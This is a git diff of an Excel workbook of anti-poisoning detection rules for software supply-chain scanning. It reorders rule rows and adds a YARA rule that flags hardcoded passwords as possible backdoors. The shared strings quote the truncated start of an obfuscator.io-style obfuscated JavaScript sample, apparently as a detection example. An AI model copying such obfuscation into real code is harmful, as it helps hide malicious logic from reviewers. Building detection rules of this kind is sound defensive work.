-      <c r="B21" s="5" t="s">
-        <v>132</v>
-      </c>
-      <c r="C21" s="5" t="s">
-        <v>143</v>
+        <v>51</v>
+      </c>
+      <c r="B21" s="3" t="s">
+        <v>55</v>
+      </c>
+      <c r="C21" s="3" t="s">
+        <v>56</v>
       </c>
       <c r="D21" s="3" t="s">
-        <v>61</v>
+        <v>53</v>
       </c>
       <c r="E21" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F21" s="4" t="s">
-        <v>144</v>
+        <v>146</v>
       </c>
       <c r="G21" s="4" t="s">
-        <v>157</v>
-      </c>
-    </row>
-    <row r="22" spans="1:7" x14ac:dyDescent="0.3">
+        <v>147</v>
+      </c>
+    </row>
+    <row r="22" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
       <c r="A22" s="3" t="s">
-        <v>67</v>
+        <v>51</v>
       </c>
       <c r="B22" s="3" t="s">
-        <v>68</v>
+        <v>57</v>
       </c>
       <c r="C22" s="3" t="s">
-        <v>69</v>
+        <v>58</v>
       </c>
       <c r="D22" s="3" t="s">
-        <v>70</v>
+        <v>53</v>
       </c>
       <c r="E22" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F22" s="3" t="s">
-        <v>71</v>
+        <v>9</v>
+      </c>
+      <c r="F22" s="4" t="s">
+        <v>146</v>
       </c>
       <c r="G22" s="4" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="23" spans="1:7" x14ac:dyDescent="0.3">
+        <v>145</v>
+      </c>
+    </row>
+    <row r="23" spans="1:7" ht="405" x14ac:dyDescent="0.3">
       <c r="A23" s="3" t="s">
-        <v>67</v>
-      </c>
-      <c r="B23" s="3" t="s">
-        <v>72</v>
+        <v>51</v>
+      </c>
+      <c r="B23" s="5" t="s">
+        <v>124</v>
       </c>
       <c r="C23" s="5" t="s">
-        <v>146</v>
+        <v>135</v>
       </c>
       <c r="D23" s="3" t="s">
-        <v>70</v>
+        <v>53</v>
       </c>
       <c r="E23" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F23" s="3" t="s">
-        <v>71</v>
+        <v>9</v>
+      </c>
+      <c r="F23" s="4" t="s">
+        <v>136</v>
       </c>
       <c r="G23" s="4" t="s">
-        <v>152</v>
+        <v>148</v>
       </c>
     </row>
     <row r="24" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A24" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B24" s="3" t="s">
-        <v>73</v>
-      </c>
-      <c r="C24" s="5" t="s">
-        <v>145</v>
+        <v>60</v>
+      </c>
+      <c r="C24" s="3" t="s">
+        <v>61</v>
       </c>
       <c r="D24" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E24" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F24" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G24" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="25" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A25" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B25" s="3" t="s">
-        <v>74</v>
-      </c>
-      <c r="C25" s="3" t="s">
-        <v>33</v>
+        <v>64</v>
+      </c>
+      <c r="C25" s="5" t="s">
+        <v>138</v>
       </c>
       <c r="D25" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E25" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F25" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G25" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="26" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A26" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B26" s="3" t="s">
-        <v>75</v>
-      </c>
-      <c r="C26" s="3" t="s">
-        <v>76</v>
+        <v>65</v>
+      </c>
+      <c r="C26" s="5" t="s">
+        <v>137</v>
       </c>
       <c r="D26" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E26" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F26" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G26" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="27" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A27" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B27" s="3" t="s">
-        <v>77</v>
+        <v>66</v>
       </c>
       <c r="C27" s="3" t="s">
-        <v>78</v>
+        <v>28</v>
       </c>
       <c r="D27" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E27" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F27" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G27" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="28" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A28" s="3" t="s">
+        <v>59</v>
+      </c>
+      <c r="B28" s="3" t="s">
         <v>67</v>
       </c>
-      <c r="B28" s="3" t="s">
-        <v>79</v>
-      </c>
-      <c r="C28" s="5" t="s">
-        <v>147</v>
+      <c r="C28" s="3" t="s">
+        <v>68</v>
       </c>
       <c r="D28" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E28" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F28" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G28" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="29" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A29" s="3" t="s">
-        <v>67</v>
-      </c>
-      <c r="B29" s="5" t="s">
-        <v>139</v>
-      </c>
-      <c r="C29" s="5" t="s">
-        <v>140</v>
+        <v>59</v>
+      </c>
+      <c r="B29" s="3" t="s">
+        <v>69</v>
+      </c>
+      <c r="C29" s="3" t="s">
+        <v>70</v>
       </c>
       <c r="D29" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E29" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F29" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G29" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="30" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A30" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B30" s="3" t="s">
-        <v>80</v>
-      </c>
-      <c r="C30" s="3" t="s">
-        <v>81</v>
+        <v>71</v>
+      </c>
+      <c r="C30" s="5" t="s">
+        <v>139</v>
       </c>
       <c r="D30" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E30" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F30" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G30" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="31" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A31" s="3" t="s">
-        <v>67</v>
-      </c>
-      <c r="B31" s="3" t="s">
-        <v>82</v>
-      </c>
-      <c r="C31" s="3" t="s">
-        <v>83</v>
+        <v>59</v>
+      </c>
+      <c r="B31" s="5" t="s">
+        <v>131</v>
+      </c>
+      <c r="C31" s="5" t="s">
+        <v>132</v>
       </c>
       <c r="D31" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E31" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F31" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G31" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="32" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A32" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B32" s="3" t="s">
-        <v>84</v>
+        <v>72</v>
       </c>
       <c r="C32" s="3" t="s">
-        <v>50</v>
+        <v>73</v>
       </c>
       <c r="D32" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E32" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F32" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G32" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="33" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A33" s="3" t="s">
-        <v>67</v>
-      </c>
-      <c r="B33" s="5" t="s">
-        <v>142</v>
-      </c>
-      <c r="C33" s="5" t="s">
-        <v>141</v>
+        <v>59</v>
+      </c>
+      <c r="B33" s="3" t="s">
+        <v>74</v>
+      </c>
+      <c r="C33" s="3" t="s">
+        <v>75</v>
       </c>
       <c r="D33" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E33" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F33" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G33" s="4" t="s">
-        <v>152</v>
+        <v>143</v>
       </c>
     </row>
     <row r="34" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A34" s="3" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="B34" s="3" t="s">
-        <v>85</v>
+        <v>76</v>
       </c>
       <c r="C34" s="3" t="s">
-        <v>86</v>
+        <v>42</v>
       </c>
       <c r="D34" s="3" t="s">
-        <v>70</v>
+        <v>62</v>
       </c>
       <c r="E34" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F34" s="3" t="s">
-        <v>71</v>
+        <v>63</v>
       </c>
       <c r="G34" s="4" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="35" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="35" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A35" s="3" t="s">
-        <v>87</v>
+        <v>59</v>
       </c>
       <c r="B35" s="5" t="s">
         <v>134</v>
       </c>
-      <c r="C35" s="3" t="s">
-        <v>88</v>
+      <c r="C35" s="5" t="s">
+        <v>133</v>
       </c>
       <c r="D35" s="3" t="s">
-        <v>89</v>
+        <v>62</v>
       </c>
       <c r="E35" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F35" s="2" t="s">
-        <v>90</v>
+        <v>9</v>
+      </c>
+      <c r="F35" s="3" t="s">
+        <v>63</v>
       </c>
       <c r="G35" s="4" t="s">
-        <v>158</v>
-      </c>
-    </row>
-    <row r="36" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="36" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A36" s="3" t="s">
-        <v>87</v>
+        <v>59</v>
       </c>
       <c r="B36" s="3" t="s">
-        <v>91</v>
+        <v>77</v>
       </c>
       <c r="C36" s="3" t="s">
-        <v>92</v>
+        <v>78</v>
       </c>
       <c r="D36" s="3" t="s">
-        <v>89</v>
+        <v>62</v>
       </c>
       <c r="E36" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F36" s="3" t="s">
-        <v>93</v>
+        <v>63</v>
       </c>
       <c r="G36" s="4" t="s">
-        <v>159</v>
-      </c>
-    </row>
-    <row r="37" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="37" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A37" s="3" t="s">
-        <v>87</v>
-      </c>
-      <c r="B37" s="3" t="s">
-        <v>94</v>
+        <v>79</v>
+      </c>
+      <c r="B37" s="5" t="s">
+        <v>126</v>
       </c>
       <c r="C37" s="3" t="s">
-        <v>95</v>
+        <v>80</v>
       </c>
       <c r="D37" s="3" t="s">
-        <v>96</v>
+        <v>81</v>
       </c>
       <c r="E37" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F37" s="3" t="s">
-        <v>97</v>
+        <v>9</v>
+      </c>
+      <c r="F37" s="2" t="s">
+        <v>82</v>
       </c>
       <c r="G37" s="4" t="s">
-        <v>160</v>
+        <v>149</v>
       </c>
     </row>
     <row r="38" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A38" s="3" t="s">
+        <v>79</v>
+      </c>
+      <c r="B38" s="3" t="s">
+        <v>83</v>
+      </c>
+      <c r="C38" s="3" t="s">
+        <v>84</v>
+      </c>
+      <c r="D38" s="3" t="s">
+        <v>81</v>
+      </c>
+      <c r="E38" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F38" s="3" t="s">
+        <v>85</v>
+      </c>
+      <c r="G38" s="4" t="s">
+        <v>150</v>
+      </c>
+    </row>
+    <row r="39" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+      <c r="A39" s="3" t="s">
+        <v>79</v>
+      </c>
+      <c r="B39" s="3" t="s">
+        <v>86</v>
+      </c>
+      <c r="C39" s="3" t="s">
         <v>87</v>
       </c>
-      <c r="B38" s="3" t="s">
-        <v>98</v>
-      </c>
-      <c r="C38" s="5" t="s">
-        <v>135</v>
-      </c>
-      <c r="D38" s="3" t="s">
-        <v>96</v>
-      </c>
-      <c r="E38" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F38" s="3" t="s">
-        <v>99</v>
-      </c>
-      <c r="G38" s="4" t="s">
-        <v>161</v>
-      </c>
-    </row>
-    <row r="39" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
-      <c r="A39" s="3" t="s">
-        <v>87</v>
-      </c>
-      <c r="B39" s="5" t="s">
-        <v>137</v>
-      </c>
-      <c r="C39" s="3" t="s">
-        <v>100</v>
-      </c>
       <c r="D39" s="3" t="s">
+        <v>88</v>
+      </c>
+      <c r="E39" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F39" s="3" t="s">
         <v>89</v>
       </c>
-      <c r="E39" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F39" s="3" t="s">
-        <v>101</v>
-      </c>
       <c r="G39" s="4" t="s">
-        <v>162</v>
+        <v>151</v>
       </c>
     </row>
     <row r="40" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A40" s="3" t="s">
-        <v>87</v>
-      </c>
-      <c r="B40" s="5" t="s">
-        <v>136</v>
-      </c>
-      <c r="C40" s="3" t="s">
-        <v>102</v>
+        <v>79</v>
+      </c>
+      <c r="B40" s="3" t="s">
+        <v>90</v>
+      </c>
+      <c r="C40" s="5" t="s">
+        <v>127</v>
       </c>
       <c r="D40" s="3" t="s">
-        <v>89</v>
+        <v>88</v>
       </c>
       <c r="E40" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F40" s="3" t="s">
-        <v>103</v>
+        <v>91</v>
       </c>
       <c r="G40" s="4" t="s">
-        <v>138</v>
-      </c>
-    </row>
-    <row r="41" spans="1:7" x14ac:dyDescent="0.3">
+        <v>152</v>
+      </c>
+    </row>
+    <row r="41" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A41" s="3" t="s">
-        <v>104</v>
-      </c>
-      <c r="B41" s="3" t="s">
-        <v>105</v>
+        <v>79</v>
+      </c>
+      <c r="B41" s="5" t="s">
+        <v>129</v>
       </c>
       <c r="C41" s="3" t="s">
-        <v>106</v>
+        <v>92</v>
       </c>
       <c r="D41" s="3" t="s">
-        <v>89</v>
+        <v>81</v>
       </c>
       <c r="E41" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F41" s="3" t="s">
-        <v>10</v>
-      </c>
-    </row>
-    <row r="42" spans="1:7" x14ac:dyDescent="0.3">
+        <v>93</v>
+      </c>
+      <c r="G41" s="4" t="s">
+        <v>153</v>
+      </c>
+    </row>
+    <row r="42" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A42" s="3" t="s">
-        <v>104</v>
-      </c>
-      <c r="B42" s="3" t="s">
-        <v>107</v>
+        <v>79</v>
+      </c>
+      <c r="B42" s="5" t="s">
+        <v>128</v>
       </c>
       <c r="C42" s="3" t="s">
-        <v>69</v>
+        <v>94</v>
       </c>
       <c r="D42" s="3" t="s">
-        <v>89</v>
+        <v>81</v>
       </c>
       <c r="E42" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F42" s="3" t="s">
-        <v>10</v>
+        <v>95</v>
+      </c>
+      <c r="G42" s="4" t="s">
+        <v>130</v>
       </c>
     </row>
     <row r="43" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A43" s="3" t="s">
-        <v>104</v>
+        <v>96</v>
       </c>
       <c r="B43" s="3" t="s">
-        <v>108</v>
+        <v>97</v>
       </c>
       <c r="C43" s="3" t="s">
-        <v>45</v>
+        <v>98</v>
       </c>
       <c r="D43" s="3" t="s">
-        <v>89</v>
+        <v>81</v>
       </c>
       <c r="E43" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F43" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
     </row>
     <row r="44" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A44" s="3" t="s">
-        <v>104</v>
+        <v>96</v>
       </c>
       <c r="B44" s="3" t="s">
-        <v>109</v>
+        <v>99</v>
       </c>
       <c r="C44" s="3" t="s">
-        <v>45</v>
+        <v>61</v>
       </c>
       <c r="D44" s="3" t="s">
-        <v>89</v>
+        <v>81</v>
       </c>
       <c r="E44" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F44" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
     </row>
     <row r="45" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A45" s="3" t="s">
-        <v>104</v>
+        <v>96</v>
       </c>
       <c r="B45" s="3" t="s">
-        <v>110</v>
+        <v>100</v>
       </c>
       <c r="C45" s="3" t="s">
-        <v>29</v>
+        <v>37</v>
       </c>
       <c r="D45" s="3" t="s">
-        <v>89</v>
+        <v>81</v>
       </c>
       <c r="E45" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F45" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
     </row>
     <row r="46" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A46" s="3" t="s">
-        <v>104</v>
+        <v>96</v>
       </c>
       <c r="B46" s="3" t="s">
-        <v>111</v>
+        <v>101</v>
       </c>
       <c r="C46" s="3" t="s">
-        <v>112</v>
+        <v>37</v>
       </c>
       <c r="D46" s="3" t="s">
-        <v>113</v>
+        <v>81</v>
       </c>
       <c r="E46" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="F46" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
     </row>
     <row r="47" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A47" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B47" s="3" t="s">
+        <v>102</v>
+      </c>
+      <c r="C47" s="3" t="s">
+        <v>24</v>
+      </c>
+      <c r="D47" s="3" t="s">
+        <v>81</v>
+      </c>
+      <c r="E47" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F47" s="3" t="s">
+        <v>9</v>
+      </c>
+    </row>
+    <row r="48" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="A48" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B48" s="3" t="s">
+        <v>103</v>
+      </c>
+      <c r="C48" s="3" t="s">
         <v>104</v>
       </c>
-      <c r="B47" s="3" t="s">
-        <v>114</v>
-      </c>
-      <c r="C47" s="3" t="s">
-        <v>115</v>
-      </c>
-      <c r="D47" s="3" t="s">
-        <v>116</v>
-      </c>
-      <c r="E47" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="F47" s="3" t="s">
-        <v>10</v>
-      </c>
-    </row>
-    <row r="48" spans="1:7" x14ac:dyDescent="0.3">
-      <c r="A48" s="3"/>
-      <c r="B48" s="3"/>
-      <c r="C48" s="3"/>
-      <c r="D48" s="3"/>
-      <c r="E48" s="3"/>
-      <c r="F48" s="3"/>
+      <c r="D48" s="3" t="s">
+        <v>105</v>
+      </c>
+      <c r="E48" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F48" s="3" t="s">
+        <v>9</v>
+      </c>
     </row>
     <row r="49" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A49" s="3"/>
-      <c r="B49" s="3"/>
-      <c r="C49" s="3"/>
-      <c r="D49" s="3"/>
-      <c r="E49" s="3"/>
-      <c r="F49" s="3"/>
+      <c r="A49" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B49" s="3" t="s">
+        <v>106</v>
+      </c>
+      <c r="C49" s="3" t="s">
+        <v>107</v>
+      </c>
+      <c r="D49" s="3" t="s">
+        <v>108</v>
+      </c>
+      <c r="E49" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F49" s="3" t="s">
+        <v>9</v>
+      </c>
     </row>
     <row r="50" spans="1:6" x14ac:dyDescent="0.3">
       <c r="A50" s="3"/>
@@ -2186,8 +2244,24 @@
       <c r="E51" s="3"/>
       <c r="F51" s="3"/>
     </row>
+    <row r="52" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="A52" s="3"/>
+      <c r="B52" s="3"/>
+      <c r="C52" s="3"/>
+      <c r="D52" s="3"/>
+      <c r="E52" s="3"/>
+      <c r="F52" s="3"/>
+    </row>
+    <row r="53" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="A53" s="3"/>
+      <c r="B53" s="3"/>
+      <c r="C53" s="3"/>
+      <c r="D53" s="3"/>
+      <c r="E53" s="3"/>
+      <c r="F53" s="3"/>
+    </row>
   </sheetData>
-  <autoFilter ref="A1:G47" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
+  <autoFilter ref="A1:G49" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
   <phoneticPr fontId="1" type="noConversion"/>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>

--- a/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
+++ b/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20395"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20396"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\PycharmProjects\new-repo\anti-poisoning\tools\SoftwareSupplyChainSecurity-v1\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\l00609832\Desktop\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7383544F-F6F9-4200-A778-5067F7B0C672}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{74F7B6D1-D9BE-4128-8C5C-EE0D76AEACA3}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="0" windowWidth="28620" windowHeight="11205" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -16,14 +16,14 @@
     <sheet name="各社区使用规则集统计" sheetId="1" r:id="rId1"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$49</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$50</definedName>
   </definedNames>
   <calcPr calcId="144525"/>
 </workbook>
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="336" uniqueCount="167">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="686" uniqueCount="169">
   <si>
     <t>语言类型</t>
   </si>
@@ -716,6 +716,15 @@
     <t>// https://obfuscator.io
 (function(_0x40dd5c,_0x2cdbbd){var _0x211b57=_0x2919,_0x19918a=_0x40dd5c();while(!![]){try{var _0x255555=parseInt(_0x211b57(0x1a3))/0x1*(parseInt(_0x211b57(0x198))/0x2)+parseInt(_0x211b57(0x19e))/0x3*(-parseInt(_0x211b57(0x19c))/0x4)+parseInt(_0x211b57(0x1a2))/0x5+parseInt(_0x211b57(0x19b))/0x6*(-parseInt(_0x211b57(0x197))/0x7)+-parseInt(_0x211b57(0x19f))/0x8+parseInt(_0x211b57(0x19d))/0x9*(parseInt(_0x211b57(0x199))/0xa)+parseInt(_0x211b57(0x1a0))/0xb*</t>
     <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>c_scan/c_yara/c_password_strcmp.yar_all</t>
+  </si>
+  <si>
+    <t>代码中存在硬编码的口令，存在被质疑为后门的可能，禁止在代码中存放口令。
+此外，如果在开源代码中存放口令，容易被黑客窃取，从而造成损失。
+如果属于误报，请进行屏蔽。
+修复方式：放到执行环境的环境变量或配置文件中。</t>
   </si>
 </sst>
 </file>
@@ -1106,10 +1115,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:G53"/>
+  <dimension ref="A1:G54"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A32" workbookViewId="0">
-      <selection activeCell="B37" sqref="B37"/>
+    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
+      <selection activeCell="B6" sqref="B6"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5" x14ac:dyDescent="0.3"/>
@@ -1237,38 +1246,38 @@
         <v>161</v>
       </c>
     </row>
-    <row r="6" spans="1:7" ht="81" x14ac:dyDescent="0.3">
-      <c r="A6" s="3" t="s">
+    <row r="6" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="A6" s="5" t="s">
         <v>6</v>
       </c>
-      <c r="B6" s="3" t="s">
-        <v>11</v>
+      <c r="B6" s="5" t="s">
+        <v>167</v>
       </c>
       <c r="C6" s="5" t="s">
-        <v>110</v>
+        <v>7</v>
       </c>
       <c r="D6" s="3" t="s">
         <v>8</v>
       </c>
-      <c r="E6" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F6" s="2" t="s">
-        <v>12</v>
+      <c r="E6" s="5" t="s">
+        <v>9</v>
+      </c>
+      <c r="F6" s="4" t="s">
+        <v>10</v>
       </c>
       <c r="G6" s="4" t="s">
-        <v>141</v>
-      </c>
-    </row>
-    <row r="7" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+        <v>168</v>
+      </c>
+    </row>
+    <row r="7" spans="1:7" ht="81" x14ac:dyDescent="0.3">
       <c r="A7" s="3" t="s">
         <v>6</v>
       </c>
       <c r="B7" s="3" t="s">
-        <v>13</v>
-      </c>
-      <c r="C7" s="3" t="s">
-        <v>14</v>
+        <v>11</v>
+      </c>
+      <c r="C7" s="5" t="s">
+        <v>110</v>
       </c>
       <c r="D7" s="3" t="s">
         <v>8</v>
@@ -1277,44 +1286,44 @@
         <v>9</v>
       </c>
       <c r="F7" s="2" t="s">
-        <v>15</v>
+        <v>12</v>
       </c>
       <c r="G7" s="4" t="s">
         <v>141</v>
       </c>
     </row>
-    <row r="8" spans="1:7" ht="337.5" x14ac:dyDescent="0.3">
+    <row r="8" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A8" s="3" t="s">
-        <v>16</v>
+        <v>6</v>
       </c>
